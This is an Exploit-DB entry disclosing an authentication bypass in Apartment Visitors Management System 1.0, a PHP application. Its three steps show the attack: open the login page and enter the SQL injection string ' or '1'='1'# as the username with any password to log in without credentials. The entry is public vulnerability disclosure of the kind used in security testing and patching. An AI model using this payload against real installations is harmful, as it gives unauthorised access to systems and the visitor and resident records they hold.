Apartment Visitors Management System 1.0 - Authentication Bypass

EDB-ID:

49335

CVE:

N/A




Platform:

PHP

Date:

2020-12-24


# Exploit Title: Apartment Visitors Management System 1.0 - Authentication Bypass
# Date: 2020-12-24 
# Exploit Author:  Kshitiz Raj(manitorpotterk)
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
# Version: V1.0 
# Tested on: Windows 10/Kali Linux

Step 1 -  Go to url http://localhost/avms/index.php
<http://localhost/avms/index.php>*

Step 2 – Enter Username :-   ' or '1'='1'# *

Step 3 -  Enter Password - anything*